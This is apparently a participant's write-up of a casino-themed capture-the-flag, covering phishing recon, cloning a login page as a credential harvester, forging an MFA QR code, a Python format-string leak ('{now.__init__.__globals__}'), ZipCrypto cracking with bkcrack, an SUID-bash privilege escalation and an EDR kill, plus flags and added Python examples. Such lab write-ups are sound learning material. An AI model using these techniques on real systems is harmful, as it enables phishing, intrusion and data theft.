There were 10 Offense challenges with one having two sub-challenges, for a total of 11 flags to find with 1800 points possible.
This section was kind of painful. I couldn't quite make it without some hints and some nudges from the cohort. Still, I was able to finish, which I'm pretty happy about!
O1 - Find your Targets
Prerequisites: Complete the tutorial.
Phishing is the leading infection vector, so as a red-teamer, how would you go about phishing the casino? Find what you need to phish someone at the casino and there should be a flag nearby!
Given:
Link Casino homepage
O1 - Find your Targets [hint]
Pivot, pivot, pivot.
O1 - Find your Targets [solution]
Go to the casino website. Click on “The Team”. Review the info. There are some social media handles here.
Go to X.com and look up the handles (yes, if you don't have an account, you have to create one). Dig around to find the only team member that didn’t have socials.
They have a GitHub link on their profile. Use that link.
Their GitHub profile has an email address on it, and near the email address is the flag:
ctf{maybeD0ntLISTtheC0rpEm@il}
WARNING: if you view this on a cell phone the flag will not or may not show. You must view it on a desktop or put your phone in landscape mode.
O2 - Build a Credential Harvester
Prerequisites: Complete the tutorial.
After you have something to phish, how do you leverage that to get access into an organization? Credential harvesters are great for this and the best ones look like the real thing. Fortunately there are tools, like HTTrack, that help us quickly and easily clone websites. The flag is received once you successfully clone the casino homepage and enter the credentials "admin" and "password" there.
O2 - Build a Credential Harvester [solution]
First you need to install HTTrack. In Kali, I had to do the following (it's been a while since I had to do anything in Linux, so it took me a while to figure this out again):
sudo apt-get update
sudo apt-get install httrack
In the final command, substitute the casino's URL for <url>. Also, remember that HTTrack creates the folder for the website in whatever directory you are currently in (i.e. if you are in the Downloads folder, a new folder for the website will be created in Downloads).
httrack <url>
Once it’s done, open the folder, find the “employee-login.html” page and open it. Then just enter “admin” and “password” into the boxes and click login. You should get the flag underneath the button.
h4rv3st3r_h3r0
Just remember you can't navigate to the actual page. You have to use the page you copied with HTTrack.
O3 - Constructing your Phish
Prerequisites: Complete the tutorial.
Awesome. Now you have a credential harvester and an email to send it to. Now you just need to craft a convincing phish to get your target to click on it! How do you do that? By leveraging real emails sent to your target to craft a fake one! We've gotten ahold of an MFA onboarding email from the company, can you create a fake QR code to send to your target? Once you have submitted the correct QR code, you'll get the flag!
Given:
MFA onboarding email
a URL to validate the QR code
O3 - Constructing your Phish [hint]
This was another one that took way longer than I think it should have.
For this, just use the email. Get as much information as you can from the email. It actually cleverly has quite a bit of information in it!
I'm not sure how much more to tell on this one. But after you find all the information, it's just a matter of fiddling with the "recipe" on CyberChef.
Maybe one more hint that might have helped me get this one faster. If you don't want another hint, don't read any farther!!!
If you put the QR code image into Cyberchef, then to decode it, you need 3 blocks.
O3 - Constructing your Phish [solution]
Using either Google or CyberChef to look at the QR code, it gives you
We know it’s likely Base64 from the "=" at the end, and the MFA message from their security company mentions an “mfa_secret” field as well as XOR (Xpert Online Resilience).
So, you can either paste the above text into CyberChef or import the QR code and use “Parse QR Code” as your first block. After that, add a “From Base64” block and an “XOR” block, leaving everything at the defaults. You’ll see a bunch of junk, but knowing that “mfa_secret” is part of the plaintext, put “mfa_secret” into the XOR block as the key and change the encoding next to it from “Hex” to “UTF8”.
This should show the first 8-10 correct characters of the key in the Output window, starting with “0719202207”. Replace the key with that string, minus the repeating part (07), and you should get a complete plaintext string!
Now, just copy all of that, delete everything in CyberChef, and paste that into the Input window of CyberChef. Be sure to change the URL!
Now we have to do the reverse. At the top goes the XOR, then “To Base64”, and finally “Generate QR Code”. Make sure the same options and key go into the XOR block. Save the generated image and submit it to get the flag!
flag{WI$h_I’d_Squ!sh3d_Th@t_BuG}
For me, the part that tripped me up was needing to switch the XOR from Hex to UTF-8. Such a minor thing and, in retrospect, a very obvious thing. But I tried so many different combinations... :*)
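The CyberChef recipe above is a known-plaintext attack on repeating-key XOR. Here it is as an added Python example (my code, not part of the original write-up or the CTF), using a constructed key, payload and URLs instead of the challenge's real data: recover the key from the "mfa_secret" crib, decode, change the URL, and re-encode with the same key.

```python
import base64
from itertools import cycle

# Constructed sample, not the CTF's data: a short repeating key and an enrolment
# payload containing the "mfa_secret" field that the page uses as known plaintext.
KEY = b"07192022"
CRIB = b"mfa_secret"
OLD_URL = b"https://mfa.example.com/enrol"
NEW_URL = b"https://mfa.example.net/enrol"
PLAINTEXT = (b'{"user":"alice@example.com","mfa_secret":"JBSWY3DPEHPK3PXP",'
             b'"url":"' + OLD_URL + b'"}')


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def encode_payload(plaintext: bytes, key: bytes) -> str:
    """What the onboarding QR code carries: XOR with the key, then Base64."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode()

def decode_payload(encoded: str, key: bytes) -> bytes:
    """The reverse (CyberChef: From Base64, then XOR with the same key)."""
    return xor_bytes(base64.b64decode(encoded), key)

def recover_key(encoded: str, crib: bytes, max_len: int = 16):
    """Known-plaintext attack. XORing the crib against each ciphertext window gives
    the keystream at that position; at the right position it repeats with a short
    period, and that period, rotated back to its start, is the key."""
    ciphertext = base64.b64decode(encoded)
    for off in range(len(ciphertext) - len(crib) + 1):
        window = xor_bytes(ciphertext[off:off + len(crib)], crib)
        for klen in range(1, min(max_len, len(crib)) + 1):
            if any(window[i] != window[i % klen] for i in range(len(window))):
                continue
            # window[i] == key[(off + i) % klen], so undo the offset to get key[0:klen]
            key = bytes(window[(j - off) % klen] for j in range(klen))
            # Reject false periods: the whole decryption must come out as printable text
            if all(32 <= c < 127 for c in xor_bytes(ciphertext, key)):
                return key
    return None

def forge_payload(encoded: str, crib: bytes, old_url: bytes, new_url: bytes):
    """Why the scheme gives neither confidentiality nor integrity: one captured QR
    payload plus one predictable field is enough to recover the key and re-encode."""
    key = recover_key(encoded, crib)
    if key is None:
        return None
    return encode_payload(decode_payload(encoded, key).replace(old_url, new_url), key)


CAPTURED = encode_payload(PLAINTEXT, KEY)  # stands in for the decoded QR code text
```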
O4 - Use your Captured Creds
Prerequisites: Complete O1, O2, and O3.
Your victim has clicked on the link and you've gotten their credentials! Now what? Why use those credentials to get into the casino! You've logged into the victim's email, who happens to be on the security team, so now you need to dig around their email. What useful information can you find? Looks like you could find the name of their Endpoint Detection and Response (EDR) tool! The name of the EDR is the flag.
O4 - Use your Captured Creds [solution]
This is mostly just looking through emails that look likely. There were actually two names: Sentry Guard EDR (which was in PoC status in the Junk folder) and an email from CyberGuardianPro in the Favorites folder. Based on the wording of both, the flag was:
CyberGuardianPro
O5 - Take Over an EDR Account
Prerequisites: Complete O4.
Now that you know the name of the EDR that the casino is using, can you leverage that to further your access into their network? Many companies are now using Multi-Factor Authentication (MFA) to provide additional defenses against unauthorized access. After reviewing your victim's email, it looks like the casino is using their own (insecure) MFA generating app, and you've gotten access to its source code. Can you figure out how to get the One Time Password (OTP) to reset the victim's password? You get 10000 attempts. :)
O5 - Take Over an EDR Account [hint]
This one was tough, which is probably why there were 10,000 attempts allowed.
There are realistically only two things that you need to know to solve this:
What the code is doing (you can read the source code or build the app)
What information you need to use to get the OTP to reset the victim's password
The only other thing I'll say is that there is a piece of information you need that a lot of people missed, including myself. It was super easy to miss, but when you realize what it is, it hits you like a ton of bricks.
In the real challenge, you had a lot more information than what I provided above; however, I did provide everything you need to figure out what the OTP was without needing to sort through all the extraneous information.
O5 - Take Over an EDR Account [solution]
First, I downloaded Visual Studio; make sure it’s for your OS. In my case, I didn’t look far enough down to find the .deb file for Kali. Download that file and run the following command to install it.
sudo dpkg -i package_name.deb
However, in retrospect, you don’t need to do that.
Just open the files in a text editor. They’re short files. A bunch of files have the “.class” extension, so just find the ones that end in “.java”. For me, they were in “Downloads/alg_gen/src/main/java/cs/com/alg_gen” and then in separate folders after that, but there weren't many files, so it was easy. Just read the code. I wasn’t familiar with Java, so it took a while, but I figured it out.
What was hard was that the code told me that the OTP was based on the time. But when I tried, it wasn't the flag. I looked everywhere, but the rest of the code just looked like extra stuff to throw you off and had no effect on the actual result.
I kept thinking I was misunderstanding the code since it does ask for an email and I didn't have the right answer yet. But since it didn’t use the email after that, or at least I couldn't find that part, I didn’t think that was it.
I finally figured it out. It’s not the email address that is being used. It’s the TIME that the original email was sent that is used.
Therefore, the date/time the email was sent was May 24, 2024 12:23 PM, which makes the flag:
241223
This was another one that I spent way too long looking at.
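As an added example (my code, not the challenge's app), here is the time-only derivation as I read the page's result (day, hour, minute of the email, which is an assumption about the app) next to a standard RFC 4226/6238 HOTP/TOTP, which mixes in a per-user secret so that knowing the time alone gives you nothing.

```python
import hashlib
import hmac
from datetime import datetime


def weak_otp(sent_at: str) -> str:
    """The insecure scheme as I read the page's result (an assumption about the app):
    the OTP is just the day, hour and minute of the onboarding email, so
    "2024-05-24T12:23" -> "241223". No secret is mixed in, so anyone who knows when
    the email was sent can compute it, and the whole space is at most
    31 * 24 * 60 = 44,640 codes regardless."""
    return datetime.fromisoformat(sent_at).strftime("%d%H%M")


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter set to the current 30-second window.
    Time is public here too, but without the per-user secret the code cannot be
    derived, so an enrolment timestamp on its own is worthless to an attacker."""
    return hotp(secret, unix_time // step, digits)
```

The HOTP/TOTP values can be checked against the RFC 4226 and RFC 6238 test vectors (ASCII secret "12345678901234567890").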
O6 - Find a Way In
Prerequisites: Complete O3.
Now that you have credentials and the OTP, where can you use them? Scan the casino's server to determine what services are running on it and if any are vulnerable.
Given:
URL and port
O6 - Find a Way In [solution]
I had to remember how to use nmap for this. lol. This is the command I ran:
sudo nmap 0.cloud.chals.io -p 12557 -sV
Which gave me back a bunch of junk, but within that junk was a discernible flag:
ctf{t@rgetL0ck3d}
O7 - Bypass the EDR
Prerequisites: Complete O5.
Great! You've gotten access to a host in the casino's network, great job! Now, you'll want to establish persistence - aka a way of keeping yourself in the network. One way of doing so is to install some remote control software, such as AnyDesk, but the EDR is doing its job and keeping you from installing it. How can you bypass the EDR and install the remote control software? You've got some friends in low places who you've paid to get access to an EDR bypass program. However, you need to get that program on the host as well... Once you are able to download AnyDesk to the casino's server, you'll get the flag!
Given:
Simulated URL for AnyDesk
Simulated URL for EDR Killer
A link to a simulated bash shell
O7 - Bypass the EDR [hint]
Your hint for this one is just that you want to play and do anything and everything you're allowed to. Don't forget any commands that could be used. True, there are limited commands that you are allowed to use on the simulated shell. BUT there are some commands that I definitely don't leverage that often that really cost me in the end...
Also, this one was one of the most difficult for me. You can tell because I actually bought a hint for it!
O7 - Bypass the EDR [solution]
For this one, the link redirects to a bash-like interface similar to O9.1 (I did them out of order since that one opened earlier for me). The command “curl <url>” gets a “blocked by Cyber Guardian” message. I typed “help” to see my options for this, as not all commands work on this simulated command screen.
Messing around, I found the following files: Bin/narsh, Usr/bin/cguard (“simulated script”), Usr/bin/cguardd ("permission denied"), and Var/lib/cguard.sentinel (“guarding”).
No matter what curl commands or echo commands or redirect commands I ran, all of them failed. So that wasn't the answer...
I ended up taking the first hint, which wasn’t 100% helpful since most of it I knew, BUT I forgot that you can run “--help" on anything. I ran that option on cguard and found the following options: "script” and “disable”.
Ran the following command:
cguard --script <EDR Killer url>
Got the following back “downloaded script to /tmp/facestab”
That file had default permissions “645” = (u=rw, g=r, o=rx). Now I need to run it. I tried running "cguard --script /tmp/facestab" and got “try again”. Got a nudge from another participant that the command doesn't allow local files. So tried running the previous command with the extra parameters gotten from a pivot after the BleepingComputer article:
cguard --script <EDR Killer url> -p 10 -k
which killed the EDR!
Now that the EDR has been disabled, run the following command to upload AnyDesk to the device.
curl <AnyDesk url>
And you should get the flag!
wicys2024{anydeskanytime}
O8 - Performing an Exfil of a Filesystem
Prerequisites: Complete O6.
Reviewing the emails of your victim, you've noticed that there was a backup of a server uploaded to a secure fileshare. Sounds like $$$. How can you access it? You've gotten access to the password vault service running as a start, can you finish this and get the flag inside the backup zip?
Given:
Victim's emails (which shows the username and URL for the backup)
nc <url> <port>
ValuVault documentation (made only for this CTF, screenshot below)
O8 - Performing an Exfil of a Filesystem [hint]
For the first part, getting the password, this site might be a good resource:
To know where to find and what you need to exploit that vulnerability
(you'll need 3 things)
O8 - Performing an Exfil of a Filesystem [solution]
I think this one gave the MOST people problems, including me. I only took hints for two challenges and this was the second (O7 was the first).
For this one, just run the "nc" command given above in a terminal and you’ll get a list similar to the one in the ValuVault documentation: LIST, GET, etc.
Googling around on "hacking python" shows that there is a format string exploit we can try:
motd {now.__init__.__globals__}
Which spits out a ton of data, including: "MASTER_PASSWORD": 'Li0n_a83*kFYz95!2'
Then:
get backup_admin
Li0n_a83*kFYz95!2
Gives you the password for backup_admin: 8szS)89Y$jDq0t}BS:Hj<37J
Then go back to the emails to get the link for the zip, navigate to it and enter the admin and the password to download. Congratulations! The first part of O8 is complete!
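An added Python example (my code, not the ValuVault service's) reconstructing the bug class behind that motd command: a user-supplied template passed to str.format() can walk attributes from a harmless object to its module's globals, whereas string.Template substitution cannot. The class, the field name and the secret value are constructed placeholders.

```python
import string

# Constructed stand-in for the vault service: a module-level secret and a
# Python-defined class whose bound method exposes the module globals via __globals__.
MASTER_PASSWORD = "constructed-example-secret"   # placeholder, not the CTF's value


class Clock:
    def __init__(self) -> None:
        self.now = "2024-05-24 12:23"

    def __str__(self) -> str:
        return self.now


def motd_vulnerable(template: str) -> str:
    """The bug: the client-supplied MOTD template goes straight into str.format().
    Format fields allow attribute access, so "{now.__init__.__globals__}" walks from
    a harmless object to the namespace of the module that defined it and dumps
    every global, secrets included."""
    return template.format(now=Clock())


def motd_hardened(template: str) -> str:
    """Fix: never let user input choose the format field. string.Template only does
    plain $name substitution on a pre-rendered string, so "$now.__init__" yields the
    time followed by the literal text ".__init__", and "${now.__init__}" is simply
    left untouched by safe_substitute."""
    return string.Template(template).safe_substitute(now=str(Clock()))


def leaks_secret(rendered: str) -> bool:
    """Detection helper: does the rendered banner contain the vault secret?"""
    return MASTER_PASSWORD in rendered
```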
Now that we have the zip, what's in it? There are six empty folders and two encrypted text files in the zip (flag.txt and slots.txt). How can we decrypt the flag?
First, let's gather some information about the zip:
7z l -slt backup.zip
Shows us that the "Method" for flag.txt is ZipCrypto Store. Googling the weaknesses of ZipCrypto shows that known-plaintext attacks work against it. But that needs some known text. How do we get that? I tried guessing for a short bit, but then went back to the drawing board. Comparing the file sizes for flag.txt and slots.txt, slots.txt is significantly bigger, meaning more text, and potentially more known plaintext.
Wait. Have we seen slots before somewhere? Oh yeah. In the password vault. Let's try getting it using the same method as backup_admin. We get a new password. Where can we use that? Well, considering the file we just got was a backup of that same server, we can just change the URL from that email from "../backup.zip" to "../slots.txt". We get a password prompt, enter the information we just found in the vault and are able to download the file!
Cool. Now we have some known plaintext! Now what? From our searching before, we know that there is a tool called bkcrack that works against these zips. Download away! Now, you can't install the file I found; you need to run it the "old-fashioned" way with "./" before the program name. Copy the first part of the slots file into a new text file called "plain.txt". Per the instructions on that GitHub page, run the following command:
./bkcrack -C backup.zip -c slots.txt -p plain.txt
Wait for it to finish and you should get "Keys". Copy the keys and run the following command, substituting the Keys found above with <Keys>:
./bkcrack -C backup.zip -k <Keys> -D decrypt.zip
Now, all that's left is to open the decrypted zip and open the flag file for the win!
flag{xamine_your_zip_pretty_darn_quick}
O9.1 - Escalate your Privileges
Prerequisites: Complete O6.
Now you have access to a host on the casino's network, but you only have limited privileges on that device. You can only run certain applications and all the really helpful applications need administrator privileges. How can you elevate your privileges to get this party started? An easy way is to use a file that has the permissions you need and have it execute your command for you!
Using the NARSH (Not A Real Shell) emulator, find a file with world writable permissions that executes as root.
O9.1 - Escalate your Privileges [solution]
This one, I didn’t understand their wording very well, but what they are looking for are permissions that look like this: -rw-rw-rw-, which ended up being one file called
yydUpQ.sh
Strangely enough I did a search and there’s a second file with the same permissions. And even stranger, I did this later and didn't find this filename at all. Too bad I can't test if other filenames are flags...
O9.2 - Escalate your Privileges
Prerequisites: Complete O9.1.
You've got a file that will allow you to run commands with escalated privileges. You've already run the following command; the flag is the next command you need to run in order to successfully elevate your privileges.
cp /bin/bash /tmp && chmod +s /tmp/bash
O9.2 - Escalate your Privileges [solution]
Googling the above commands, I got a GitHub page on Linux privilege escalation, which gave me the command:
/tmp/bash -p
O10 - Sell your Access
Prerequisites: Complete O8.
Last Offense challenge! You're doing great, just one more step! You've gotten access and established persistence to the casino's network. Now you need to create a post on the dark web that will advertise your wares. Once you have created an effective advertisement, the flag will appear.
O10 - Sell your Access [solution]
The main.html page looks like you can click stuff, but the only thing you can click is the “New Post” button. There you can select the Topic, and enter your subject and message. Every time you enter something it’ll give you a message on what else you need to get the flag. I started with just saying “something” to see and it wanted the correct topic, the company name in the subject, bitcoin address, and tox id (the last two had to have the correct formatting). Then you get the flag and you’re done!